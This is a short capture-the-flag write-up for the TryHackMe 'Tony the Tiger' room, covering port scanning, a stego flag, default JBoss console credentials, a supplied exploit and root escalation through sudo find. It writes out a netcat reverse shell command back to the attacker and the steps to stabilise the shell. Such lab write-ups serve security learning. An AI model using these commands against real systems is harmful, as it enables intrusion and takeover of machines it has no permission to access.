Tony the tiger
May 5, 2021•342 words
Tony the Tiger - THM
nmap -sT 10.10.242.59 -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
The first flag, Tony's
The blog on port 80 holds the first flag. Take a look at the different posts there. If you find yourself poking around too much, stop looking at what meets the eye and go for stego. In the first post, you should download the picture and run strings against it. You should find your answer towards the bottom of the output.
The web server on 8080 shows there is an administration console. You should go there. A quick search on Google should tell you the default username and password for this kind of application (default credentials <application's name>). Once you have access to the console, poke around a little.
The second flag, JBoss
The exploit given with the room is easy to use. Run it with the -h flag to show the options. To obtain a shell, start a listener (nc -lvp <port>) and use it to run the command
nc <your ip> <port> -e /bin/bash
Stabilize the shell using
python3 -c "import pty; pty.spawn('/bin/bash')" export TERM=xterm
Then background this shell (Ctrl+x) and run (in your own shell)
stty raw -echo; fg
Poking around a little, I found that we can just easily walk into Jboss' home, there we find his flag.
The path to root is easy to FIND
Besides the flag, a useful note shows us the password for this account, so we can change our current user into Jboss. After this, it's fairly straightforward. Jboss can run find as any other user on the system (sudo -l to see for yourself). Go check GTFobins to find a straight path to root. The flag is in /root, but with a twist: it's base64 encoded. Use a decoder (either command line or online tools) and paste the hash on crackstation (alternatively, save it to a file and run john against it).